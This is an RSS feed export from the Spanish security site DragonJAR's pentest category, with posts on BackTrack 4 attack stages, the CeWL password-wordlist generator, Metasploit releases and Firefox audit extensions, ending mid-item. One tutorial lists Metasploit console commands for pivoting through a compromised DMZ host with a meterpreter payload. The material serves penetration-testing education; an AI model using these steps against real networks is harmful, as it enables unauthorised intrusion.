<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>La Comunidad DragonJAR &#187; Pentest</title>
	<atom:link href="http://www.dragonjar.org/category/pentest/feed" rel="self" type="application/rss+xml" />
	<link>http://www.dragonjar.org</link>
	<description>Noticias de actualidad y seguridad informática, herramientas de seguridad, documentación y una excelente COMUNIDAD.</description>
	<lastBuildDate>Sat, 13 Mar 2010 23:56:22 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Taxonomía de un  Ataque con Backtrack 4</title>
		<link>http://www.dragonjar.org/taxonomia-de-un-ataque-con-backtrack-4.xhtml</link>
		<comments>http://www.dragonjar.org/taxonomia-de-un-ataque-con-backtrack-4.xhtml#comments</comments>
		<pubDate>Sun, 07 Feb 2010 02:34:01 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Documentacion]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Español]]></category>
		<category><![CDATA[Videos]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3815</guid>
		<description><![CDATA[Kevin David Quiroga Astroz mas conocido como Progresive-Death en nuestra comunidad, ha lanzado un nuevo portal donde publica una buena documentación en español sobre la taxonómica de un ataque y el uso de la distribución Bactrack, algunos de los temas que contiene la pagina son:
[*] Documentos


Reconocimiento de un sistema con &#60;&#60; backtrack4 (Footprinting)
Escaneo de un [...]]]></description>
			<content:encoded><![CDATA[<p>Kevin David Quiroga Astroz mas conocido como <a rel="nofollow" target="_blank" href="http://comunidad.dragonjar.org/members/progresive-death/">Progresive-Death</a> en nuestra comunidad, ha lanzado un nuevo portal donde publica una buena documentación en español sobre la taxonómica de un ataque y el uso de la distribución Bactrack, algunos de los temas que contiene la pagina son:</p>
<p><strong>[*] Documentos</strong></p>
<div>
<ul>
<li>Reconocimiento de un sistema con <strong><span style="color: #ff0000;">&lt;&lt;</span></strong> backtrack4 (Footprinting)</li>
<li>Escaneo de un sistema con <strong><span style="color: #ff0000;">&lt;&lt;</span></strong> backtrack4 (Scanning)</li>
<li>Acceder a un sistema con <strong><span style="color: #ff0000;">&lt;&lt;</span></strong> backtrack4 (Access)</li>
<li>Mantener el acceso en un sistema con <strong><span style="color: #ff0000;">&lt;&lt;</span></strong> backtrack4 (Maintain Access)</li>
<li>Borrado de Huellas con <strong><span style="color: #ff0000;">&lt;&lt;</span></strong> backtrack 4(Clear log&#8217;s)</li>
<li>Reporte <strong><span style="color: #ff0000;">&lt;&lt;</span></strong> (Reporte algo under)</li>
</ul>
</div>
<p><strong>[*] Videos<span id="more-3815"></span></strong></p>
<div>
<ul>
<li>Acceso a un sistema con <strong><span style="color: #ff0000;">&lt;&lt;</span></strong> Backtrack 4</li>
<li>Intrusión/Ataque Automatizada con <strong><span style="color: #ff0000;">&lt;&lt;</span></strong> Backtrack 4</li>
<li>Borrado de Logs con <strong><span style="color: #ff0000;">&lt;&lt;</span></strong> Backtrack 4</li>
<li>Tunneling con <strong><span style="color: #ff0000;">&lt;&lt;</span></strong> Backtrack 4</li>
<li>Rootkits con <strong><span style="color: #ff0000;">&lt;&lt;</span></strong> Backtrack 4</li>
</ul>
</div>
<h2 style="text-align: center;"><a rel="nofollow" target="_blank" href="http://taxoback.eshost.com.ar/">Visita Taxonomía de un  Ataque con<strong>&lt;&lt;</strong> Backtrack 4</a></h2>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/foro-de-backtrack-en-espanol.xhtml" title="Foro de BackTrack en Español">Foro de BackTrack en Español</a></li><li><a href="http://www.dragonjar.org/security-freak-videos-de-iniciacion-en-seguridad-de-la-informacion.xhtml" title="Security Freak &#8211; Videos de iniciacion en seguridad de la informacion">Security Freak &#8211; Videos de iniciacion en seguridad de la informacion</a></li><li><a href="http://www.dragonjar.org/el-arte-de-ocultar-informacion.xhtml" title="El arte de ocultar información &#8211; Esteganografía">El arte de ocultar información &#8211; Esteganografía</a></li><li><a href="http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml" title="¿Cómo tomar control de un Dominio en Windows?">¿Cómo tomar control de un Dominio en Windows?</a></li><li><a href="http://www.dragonjar.org/la-arquitectura-de-seguridad-osi.xhtml" title="La arquitectura de seguridad OSI">La arquitectura de seguridad OSI</a></li><li><a href="http://www.dragonjar.org/backtrack-4-final.xhtml" title="Backtrack 4 Final">Backtrack 4 Final</a></li><li><a href="http://www.dragonjar.org/reemplazo-de-milw0rm.xhtml" title="El reemplazo de Milw0rm">El reemplazo de Milw0rm</a></li><li><a href="http://www.dragonjar.org/videos-de-las-jornadas-de-seguridad-informatica-arcert.xhtml" title="Videos de las Jornadas de Seguridad Informatica ArCERT">Videos de las Jornadas de Seguridad Informatica ArCERT</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/taxonomia-de-un-ataque-con-backtrack-4.xhtml/feed</wfw:commentRss>
		<slash:comments>21</slash:comments>
		</item>
		<item>
		<title>Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida</title>
		<link>http://www.dragonjar.org/bypass-con-metasploit-atacando-a-nuestro-objetivo-desde-una-maquina-ya-comprometida.xhtml</link>
		<comments>http://www.dragonjar.org/bypass-con-metasploit-atacando-a-nuestro-objetivo-desde-una-maquina-ya-comprometida.xhtml#comments</comments>
		<pubDate>Sun, 24 Jan 2010 21:12:55 +0000</pubDate>
		<dc:creator>Epsilon</dc:creator>
				<category><![CDATA[Herramientas Seguridad]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[bypass]]></category>
		<category><![CDATA[consola]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[framework metasploit]]></category>
		<category><![CDATA[Maquinas]]></category>
		<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[metasploit bypass]]></category>
		<category><![CDATA[meterpreter]]></category>
		<category><![CDATA[saltos]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Seguridad Informática]]></category>
		<category><![CDATA[Sesión]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3735</guid>
		<description><![CDATA[Algunas veces, al realizar un ataque es necesario vulnerar varias maquinas hasta llegar a nuestro objetivo final,  uno de los interrogantes mas  comunes en estas situaciones es ¿Como puedo atacar una maquina desde otra la cual ya tenga acceso?
Veamos un ejemplo:

Como podemos ver en la imagen anterior, un atacante puede ganar el acceso en algún [...]]]></description>
			<content:encoded><![CDATA[<p>Algunas veces, al realizar un ataque es necesario vulnerar varias maquinas hasta llegar a nuestro objetivo final,  uno de los interrogantes mas  comunes en estas situaciones es ¿Como puedo atacar una maquina desde otra la cual ya tenga acceso?</p>
<p>Veamos un ejemplo:</p>
<p style="text-align: center;"><img class="aligncenter" title="pivote metasploit" src="http://img25.imageshack.us/img25/1043/pivote.png" alt="pivote con el metasploit" width="446" height="472" /></p>
<p style="text-align: left;">Como podemos ver en la imagen anterior, un atacante puede ganar el acceso en algún servidor que se encuentre en la DMZ (zona desmiritalizada) y desde allí atacar otras maquinas que se encuentren detrás del cortafuegos. Para hacer esto posible el  amado  y conocido Metasploit nos puede ser muy útil.<span id="more-3735"></span></p>
<p style="text-align: left;">El primer paso obviamente  es encontrar una vulnerabilidad en el servidor que se encuentra en la DMZ, explotarla usando como payload meterpreter. En la consola del metasploit digitamos:</p>
<blockquote><p><code>use [exploit que ataca la vulnerabilidad encontrada]<br />
set PAYLOAD windows/meterpreter/bind_tcp<br />
set RHOST [ip_host_dmz]<br />
exploit-que-ataca-la-vulnerabilidad-encontrada</code></p></blockquote>
<p>Ahora necesitamos saber el ID de la sesión, para esto digitamos lo siguiente en la consola de meterpreter:</p>
<blockquote><p><code>sessions -l</code></p></blockquote>
<p>El siguiente paso es crear una ruta hacia la maquina objetivo, indicando su ip, la mascara y el ID session que obtuvimos en el paso anterior:</p>
<blockquote><p><code>msf&gt; route add [ip_maquina_objetivo] [Mascara  de red] [ID-Session]</code></p></blockquote>
<p>Por ultimo, lanzamos el ataque a la maquina objetivo, de forma normal como se haría en cualquier caso, es decir buscando la vulnerabilidad y aplicando el exploit respectivo, lo diferente es que debemos decirle al metasploit que debe pasar por el pc que ya se tiene acceso:</p>
<blockquote><p><code>msf&gt; use [exploit_necesario]<br />
msf&gt; set PAYLOAD windows/meterpreter/bind_tcp<br />
msf&gt; set RHOST [maquina_objetivo]<br />
msf&gt; exploit</code></p></blockquote>
<p>De esta forma podremos bypassear usando el metasploit, algo muy útil para todos los interesados en el área de la seguridad informática</p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml" title="¿Cómo tomar control de un Dominio en Windows?">¿Cómo tomar control de un Dominio en Windows?</a></li><li><a href="http://www.dragonjar.org/video-explotando-wm-downloader.xhtml" title="Video: Explotando WM Downloader ">Video: Explotando WM Downloader </a></li><li><a href="http://www.dragonjar.org/video-tutorial-fingerprint-escaneo-basico.xhtml" title="Video Tutorial Fingerprint y Escaneo Básico">Video Tutorial Fingerprint y Escaneo Básico</a></li><li><a href="http://www.dragonjar.org/todos-los-videos-de-antichat-parte-i.xhtml" title="Todos los Vídeos de AntiChat &#8211; Parte I">Todos los Vídeos de AntiChat &#8211; Parte I</a></li><li><a href="http://www.dragonjar.org/todos-los-videos-de-antichat-parte-ii.xhtml" title="Todos los Vídeos de AntiChat &#8211; Parte II">Todos los Vídeos de AntiChat &#8211; Parte II</a></li><li><a href="http://www.dragonjar.org/creando-un-exploit-paso-a-paso.xhtml" title="Creando un Exploit Paso a Paso">Creando un Exploit Paso a Paso</a></li><li><a href="http://www.dragonjar.org/pastel-chancuco-chuletas-seguridad-informatica.xhtml" title="Pastel, Cheet Sheets, Chuletas en la Seguridad Informática">Pastel, Cheet Sheets, Chuletas en la Seguridad Informática</a></li><li><a href="http://www.dragonjar.org/x-25-conferencia-de-seguridad-informatica-en-mexico.xhtml" title="X.25 Conferencia de Seguridad Informática en Mexico">X.25 Conferencia de Seguridad Informática en Mexico</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/bypass-con-metasploit-atacando-a-nuestro-objetivo-desde-una-maquina-ya-comprometida.xhtml/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Extensiones de Firefox para Auditorias de Seguridad</title>
		<link>http://www.dragonjar.org/extensiones-firefox-auditorias-seguridad.xhtml</link>
		<comments>http://www.dragonjar.org/extensiones-firefox-auditorias-seguridad.xhtml#comments</comments>
		<pubDate>Wed, 13 Jan 2010 23:50:57 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Herramientas Seguridad]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[Mozilla Firefox]]></category>
		<category><![CDATA[Plugin]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3636</guid>
		<description><![CDATA[Hace poco tenia una conversación con epsilon sobre cambiar el Firefox por uzbl en un proyecto que se esta gestionando en la comunidad,  sus argumentos era el &#8220;gran&#8221; consumo de recursos de firefox frente al uzbl, los míos que ese consumo era justificado, ya que firefox con los plugins adecuados, es una excelente herramienta de [...]]]></description>
			<content:encoded><![CDATA[<p>Hace poco tenia una conversación con <a rel="nofollow" target="_blank" href="http://www.rinconinformatico.net/">epsilon</a> sobre cambiar el Firefox por <a rel="nofollow" target="_blank" href="http://www.uzbl.org/">uzbl</a> en un proyecto que se esta gestionando en la comunidad,  sus argumentos era el &#8220;gran&#8221; consumo de recursos de firefox frente al <a rel="nofollow" target="_blank" href="http://www.uzbl.org/">uzbl</a>, los míos que ese consumo era justificado, ya que firefox con los plugins adecuados, es una excelente herramienta de seguridad, ademas los navegadores web son la puerta el 90% de las cosas que realizamos frente a un computador y utilizar un navegador tan limitado como uzbl seria un impedimento, más que un beneficio.</p>
<p>Para reafirmar el uso de Firefox como Herramienta de Seguridad les presento <a href="http://www.dragonjar.org/disponible-firecat-15.xhtml">FireCAT</a>, un completo catalogo de las extensiones para Firefox, que están especialmente diseñadas para su uso en una auditoria de seguridad:</p>
<p style="text-align: center;"><img class="alignnone" title="Auditoria Web con Firefox" src="http://i.imgur.com/7Nmyx.jpg" alt="7Nmyx Extensiones de Firefox para Auditorias de Seguridad" width="520" height="188" /></p>
<p><span id="more-3636"></span>En la comunidad ya habíamos <a href="http://www.dragonjar.org/disponible-firecat-15.xhtml">hablado del FireCAT en su versión 1.5</a>, en esa ocasión, se había publicado el catalogo de extensiones para realizar auditorias con firefox en PDF y html, con esta nueva versión 1.6 el FireCAT pasa a estar disponible de forma online, en un mapa mas interactivo creado en flash:</p>
<p style="text-align: center;"><object id="spicynodesViewer" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="530" height="250" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="scalemode" value="showall" /><param name="allowFullScreen" value="true" /><param name="wmode" value="opaque" /><param name="quality" value="high" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://media.spicynodes.org/display.swf?id=79676765f9df965b69e8ecd498e53c60&amp;nodemapID=35219" /><param name="allowfullscreen" value="true" /><embed id="spicynodesViewer" type="application/x-shockwave-flash" width="530" height="250" src="http://media.spicynodes.org/display.swf?id=79676765f9df965b69e8ecd498e53c60&amp;nodemapID=35219" allowscriptaccess="always" quality="high" wmode="opaque" allowfullscreen="true" scalemode="showall"></embed></object></p>
<p>Espero que les sea de utilidad y encuentren algunos buenos plugins que no conocian.</p>
<p><strong>Mas Información:</strong><br />
<a rel="nofollow" target="_blank" href="http://www.security-database.com/toolswatch/FireCAT-v1-6-the-online-version.html">Pagina Oficial del FireCAT</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/backtrack-4-final.xhtml" title="Backtrack 4 Final">Backtrack 4 Final</a></li><li><a href="http://www.dragonjar.org/top-100-herramientas-de-seguridad-open-source.xhtml" title="Top 100 Herramientas de Seguridad Open Source">Top 100 Herramientas de Seguridad Open Source</a></li><li><a href="http://www.dragonjar.org/wepbuster-automatizando-auditoria-redes-inalambricas.xhtml" title="WEPBuster, automatizando la auditoría de redes inalámbricas">WEPBuster, automatizando la auditoría de redes inalámbricas</a></li><li><a href="http://www.dragonjar.org/dradis-organiza-y-comparte-informacion-en-un-test-de-penetracion.xhtml" title="Dradis, organiza y comparte información en un Test de Penetración">Dradis, organiza y comparte información en un Test de Penetración</a></li><li><a href="http://www.dragonjar.org/networkminer-herramienta-forense-de-analisis-de-red.xhtml" title="NetworkMiner, Herramienta forense de Análisis de Red">NetworkMiner, Herramienta forense de Análisis de Red</a></li><li><a href="http://www.dragonjar.org/descargar-gratis-internet-explorer-8-final.xhtml" title="Descargar Gratis Internet Explorer 8 Final">Descargar Gratis Internet Explorer 8 Final</a></li><li><a href="http://www.dragonjar.org/browser-ride-explota-tu-navegador.xhtml" title="Browser Ride &#8211; Explota tu Navegador">Browser Ride &#8211; Explota tu Navegador</a></li><li><a href="http://www.dragonjar.org/gana-mas-espacio-para-tu-firefox.xhtml" title="Gana Mas Espacio para Navegar con tu Firefox">Gana Mas Espacio para Navegar con tu Firefox</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/extensiones-firefox-auditorias-seguridad.xhtml/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>CeWL &#8211; Generador de Diccionarios Personalizados</title>
		<link>http://www.dragonjar.org/generador-diccionarios-passwords.xhtml</link>
		<comments>http://www.dragonjar.org/generador-diccionarios-passwords.xhtml#comments</comments>
		<pubDate>Thu, 07 Jan 2010 05:44:23 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Herramientas Seguridad]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Bruteforce]]></category>
		<category><![CDATA[Contraseñas]]></category>
		<category><![CDATA[fuerza bruta]]></category>
		<category><![CDATA[Lista]]></category>
		<category><![CDATA[Password]]></category>
		<category><![CDATA[usuario contraseña]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3618</guid>
		<description><![CDATA[CeWL es una herramienta escrita en ruby por Robin Wood, de DigiNinja.org, que permite generar diccionarios con palabras claves, que pueden ser utilizadas por programas como Cain &#38; Abel, Bruter o John the Ripper, para realizar ataques de fuerza bruta .
Lo que diferencia CeWL de cualquier otra herramienta para generar listas de passwords, es que extrae las palabras claves [...]]]></description>
			<content:encoded><![CDATA[<p>CeWL es una herramienta escrita en ruby por Robin Wood, de <a rel="nofollow" target="_blank" href="http://www.digininja.org/projects/cewl.php">DigiNinja.org</a>, que permite generar diccionarios con palabras claves, que pueden ser utilizadas por programas como <a rel="nofollow" target="_blank" title="Permanent Link to Nueva versión de Cain &amp; Abel" rel="bookmark" href="http://www.dragonjar.org/nueva-versin-de-cain-abel.xhtml">Cain &amp; Abel</a>, <a title="Permanent Link to Bruter – Herramienta Para Crackear Password por Fuerza Bruta de Forma Paralela en Windows" rel="bookmark" href="http://www.dragonjar.org/bruter-herramienta-para-crackear-password-por-fuerza-bruta-de-forma-paralela-en-windows.xhtml">Bruter</a> o <a href="http://www.openwall.com/john/">John the Ripper</a>, para realizar ataques de fuerza bruta .</p>
<p>Lo que diferencia CeWL de cualquier otra herramienta para generar listas de passwords, es que extrae las palabras claves desde una url, por lo que la lista generada es mas especifica y puede incluir palabras que no se encuentran en las <a href="http://www.dragonjar.org/diccionarios-para-realizar-ataques-de-fuerza-bruta.xhtml">tipicas listas de password</a>, pero que posiblemente este siendo usada como clave por algun usuario del sistema.<span id="more-3618"></span></p>
<p>El modo de uso de CeWL es el siguiente: <strong>cewl [opcion u opciones] URL<span style="font-weight: normal;">, teniendo como opciones los siguientes parametros:</span></strong></p>
<dl>
<blockquote><dt><strong>&#8211;help, -h</strong></dt>
<dd>Muestra ayuda</dd>
<dt><strong>&#8211;depth x, -d x</strong></dt>
<dd>Nivel de profundida del escaneo</dd>
<dt><strong>&#8211;min_word_length, -m</strong></dt>
<dd>Tamaño minimo de cada palabra, util si no deseamos llenar la lista con palabras como &#8220;de&#8221;, &#8220;la&#8221;, &#8220;por&#8221;,etc..</dd>
<dt><strong>&#8211;offsite, -o</strong></dt>
<dd>Por defecto CeWL solo revisa una url especifica, con esta opcion escaneara tambien enlaces externos.</dd>
<dt><strong>&#8211;write, -w file</strong></dt>
<dd>Escribe la salida del CeWL en un archivo</dd>
<dt><strong>&#8211;ua, -u user-agent</strong></dt>
<dd>Cambia el user-agent</dd>
<dt><strong>-v</strong></dt>
<dd>Utiliza el modo Verbose,  mostrando mas informacion de salida</dd>
<dt><strong>&#8211;no-words, -n</strong></dt>
<dd>No muestra la lista</dd>
<dt><strong>&#8211;meta, -a</strong></dt>
<dd>Incluye meta datos</dd>
<dt><strong>&#8211;email, -e</strong></dt>
<dd>Incluye correos encontrados</dd>
<dt><strong>&#8211;meta-temp-dir directory</strong></dt>
<dd>Especifica el directorio utilizado por exiftool para convertir los archivos, por defecto es /tmp</dd>
<dt><strong>URL</strong></dt>
<dd>La url a escanear</dd>
</blockquote>
</dl>
<h2 style="text-align: center;"><a rel="nofollow" target="_blank" href="http://www.digininja.org/projects/cewl.php">Descargar CeWL Generador de Diccionarios Basado en URL`s</a></h2>
<p><strong>Mas Información:</strong><br />
<a rel="nofollow" target="_blank" href="http://www.digininja.org/projects/cewl.php">Pagina Oficial del CeWL</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml" title="Como Recuperar Clave MySQL">Como Recuperar Clave MySQL</a></li><li><a href="http://www.dragonjar.org/nueva-versin-de-cain-abel.xhtml" title="Nueva versión de Cain &#038; Abel">Nueva versión de Cain &#038; Abel</a></li><li><a href="http://www.dragonjar.org/malas-contrasenas-para-utilizar.xhtml" title="Las Peores 500 Contraseñas de Todos los Tiempos">Las Peores 500 Contraseñas de Todos los Tiempos</a></li><li><a href="http://www.dragonjar.org/como-recuperar-una-clave-en-md5.xhtml" title="Cómo recuperar una clave en MD5">Cómo recuperar una clave en MD5</a></li><li><a href="http://www.dragonjar.org/bruter-herramienta-para-crackear-password-por-fuerza-bruta-de-forma-paralela-en-windows.xhtml" title="Bruter &#8211; Herramienta Para Crackear Password por Fuerza Bruta de Forma Paralela en Windows ">Bruter &#8211; Herramienta Para Crackear Password por Fuerza Bruta de Forma Paralela en Windows </a></li><li><a href="http://www.dragonjar.org/como-eliminar-la-contrasena-de-un-pdf.xhtml" title="¿Como Eliminar la Contraseña de un PDF?">¿Como Eliminar la Contraseña de un PDF?</a></li><li><a href="http://www.dragonjar.org/diccionarios-para-realizar-ataques-de-fuerza-bruta.xhtml" title="Listado de Diccionarios para Realizar Ataques de Fuerza Bruta">Listado de Diccionarios para Realizar Ataques de Fuerza Bruta</a></li><li><a href="http://www.dragonjar.org/nuevo-gusano-infecta-routers-modems-y-sistemas-gnu-linux.xhtml" title="Nuevo Gusano Infecta Routers, Modems, y Sistemas GNU Linux">Nuevo Gusano Infecta Routers, Modems, y Sistemas GNU Linux</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/generador-diccionarios-passwords.xhtml/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Metasploit Framework 3.3.2</title>
		<link>http://www.dragonjar.org/metasploit-framework.xhtml</link>
		<comments>http://www.dragonjar.org/metasploit-framework.xhtml#comments</comments>
		<pubDate>Thu, 10 Dec 2009 17:08:40 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Herramientas Seguridad]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Framework]]></category>
		<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[meterpreter]]></category>
		<category><![CDATA[Proyectos]]></category>
		<category><![CDATA[Version]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3466</guid>
		<description><![CDATA[Metasploit es un proyecto open source que proporciona información acerca de vulnerabilidades de seguridad informática, ayuda en tests de penetración y en el desarrollo de firmas para Sistemas de Detección de Intrusos. Su subproyecto más conocido es el Metasploit Framework, una herramienta para desarrollar y ejecutar exploits contra una máquina remota. Otros subproyectos importantes son [...]]]></description>
			<content:encoded><![CDATA[<p>Metasploit es un proyecto open source<a rel="nofollow" target="_blank" title="seguridad informática" href="../tag/seguridad-informatica"></a> que proporciona información acerca de vulnerabilidades de <a rel="nofollow" target="_blank" title="seguridad informática" href="../tag/seguridad-informatica">seguridad informática</a>, ayuda en tests de penetración y en el desarrollo de firmas para Sistemas de Detección de Intrusos. Su subproyecto más conocido es el Metasploit Framework, una herramienta para desarrollar y ejecutar exploits contra una máquina remota. Otros subproyectos importantes son la bases de datos de opcodes (códigos de operación), un archivo de shellcodes, e investigación sobre seguridad.</p>
<p style="text-align: center;"><img class="alignnone" src="http://imgur.com/iaNnR.jpg" alt="iaNnR Metasploit Framework 3.3.2" width="300" height="215" title="Metasploit Framework 3.3.2" /></p>
<p>Metasploit Framework, fue escrito inicialmente utilizando el lenguaje de programación de scripting Perl, aunque actualmente ha sido escrito de nuevo completamente en el lenguaje Ruby. El proyecto Metaspoit acaba de anuncia la nueva versión del Metasploit Framework, que incluye entre otras, las siguientes novedades:<span id="more-3466"></span></p>
<ul>
<li> Metasploit ahora tiene 463 exploits y 219 módulos auxiliary (comparado con los 453 y 218 respectivamente en la v3.3.1).</li>
<li>El payload Meterpreter es ahora multi-hilo, permitiendo manejar varias peticiones al tiempo.</li>
<li> El Meterpreter es mas estable y robusto para la mayoría de los casos.</li>
<li> La base de datos subsystem ahora usa ActiveRecord para actualizar las bases de datos.</li>
<li>para ver todos <a rel="nofollow" target="_blank" href="http://www.metasploit.com/redmine/projects/framework/wiki/Release_Notes_332">los cambios en esta versión click aquí</a>.</li>
</ul>
<h2 style="text-align: center;"><a rel="nofollow" target="_blank" href="http://www.metasploit.com/framework/download/">Descarga la Ultima Versión de Metasploit FrameWork</a></h2>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/creando-un-exploit-paso-a-paso.xhtml" title="Creando un Exploit Paso a Paso">Creando un Exploit Paso a Paso</a></li><li><a href="http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml" title="¿Cómo tomar control de un Dominio en Windows?">¿Cómo tomar control de un Dominio en Windows?</a></li><li><a href="http://www.dragonjar.org/bypass-con-metasploit-atacando-a-nuestro-objetivo-desde-una-maquina-ya-comprometida.xhtml" title="Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida">Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida</a></li><li><a href="http://www.dragonjar.org/video-introduccion-al-metasploit-framework-2.xhtml" title="Vídeo: Introducción al Metasploit Framework">Vídeo: Introducción al Metasploit Framework</a></li><li><a href="http://www.dragonjar.org/metasploit-framework-32-portable-para-windows.xhtml" title="Metasploit Framework 3.2 Portable para Windows">Metasploit Framework 3.2 Portable para Windows</a></li><li><a href="http://www.dragonjar.org/metasploit-framework-portable.xhtml" title="Metasploit Framework Portable">Metasploit Framework Portable</a></li><li><a href="http://www.dragonjar.org/ezine-comunidad-dragonjar-online.xhtml" title="Ezine Comunidad DragonJAR Online">Ezine Comunidad DragonJAR Online</a></li><li><a href="http://www.dragonjar.org/backtrack-4-final.xhtml" title="Backtrack 4 Final">Backtrack 4 Final</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/metasploit-framework.xhtml/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Foro de BackTrack en Español</title>
		<link>http://www.dragonjar.org/foro-de-backtrack-en-espanol.xhtml</link>
		<comments>http://www.dragonjar.org/foro-de-backtrack-en-espanol.xhtml#comments</comments>
		<pubDate>Thu, 10 Dec 2009 16:13:44 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Noticias Seguridad]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Comunidad]]></category>
		<category><![CDATA[Español]]></category>
		<category><![CDATA[Foro]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3463</guid>
		<description><![CDATA[Hace un tiempo me contactó fuurio, un usuario de la comunidad, para comentarme los planes que tenia de sacar un soporte para los usuarios de back-track que hablan español, así empezó su tarea de reclutar gente, se creó un canal de habla hispana por IRC, una web y poco a poco se gestiono el espacio [...]]]></description>
			<content:encoded><![CDATA[<p>Hace un tiempo me contactó <a rel="nofollow" target="_blank" href="http://comunidad.dragonjar.org/members/fuurio/">fuurio</a>, un usuario de la comunidad, para comentarme los planes que tenia de sacar un soporte para los usuarios de back-track que hablan español, así empezó su tarea de reclutar gente, se creó un <a rel="nofollow" target="_blank" href="http://comunidad.dragonjar.org/f150/canal-habla-hispana-backtrack-8544/">canal de habla hispana por IRC</a>, <a rel="nofollow" target="_blank" href="http://comunidad.dragonjar.org/f150/canal-habla-hispana-backtrack-8544/#post20173">una web</a> y poco a poco se gestiono el espacio para los usuarios de habla hispana en el foro oficial de BackTrack, logrando que remote-exploit.org abriera el espacio <a rel="nofollow" target="_blank" href="http://es.remote-exploit.org/">http://es.remote-exploit.org</a></p>
<p style="text-align: center;"><img class="alignnone" title="Back Track en español" src="http://imgur.com/tokUb.png" alt="tokUb Foro de BackTrack en Español" width="500" height="300" /></p>
<p><span id="more-3463"></span>Felicitaciones a <a rel="nofollow" target="_blank" href="http://comunidad.dragonjar.org/members/fuurio/">fuurio</a> y el equipo que hizo posible este nuevo espacio para los hispanohablantes.</p>
<h2 style="text-align: center;"><a rel="nofollow" target="_blank" href="http://es.remote-exploit.org/">Entrar al Foro en Español de Back-Track</a></h2>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/taxonomia-de-un-ataque-con-backtrack-4.xhtml" title="Taxonomía de un  Ataque con Backtrack 4">Taxonomía de un  Ataque con Backtrack 4</a></li><li><a href="http://www.dragonjar.org/resultado-del-primer-reto-forense-de-la-comunidad-dragonjar.xhtml" title="Resultado del Primer Reto Forense de La Comunidad DragonJAR">Resultado del Primer Reto Forense de La Comunidad DragonJAR</a></li><li><a href="http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml" title="¿Cómo tomar control de un Dominio en Windows?">¿Cómo tomar control de un Dominio en Windows?</a></li><li><a href="http://www.dragonjar.org/backtrack-4-final.xhtml" title="Backtrack 4 Final">Backtrack 4 Final</a></li><li><a href="http://www.dragonjar.org/reemplazo-de-milw0rm.xhtml" title="El reemplazo de Milw0rm">El reemplazo de Milw0rm</a></li><li><a href="http://www.dragonjar.org/e-zine-4-comunidad-dragonjar.xhtml" title="E-zine #4 Comunidad DragonJAR ">E-zine #4 Comunidad DragonJAR </a></li><li><a href="http://www.dragonjar.org/katana-multiples-distribuciones-de-seguridad-en-tu-usb.xhtml" title="Katana &#8211; Múltiples Distribuciones de 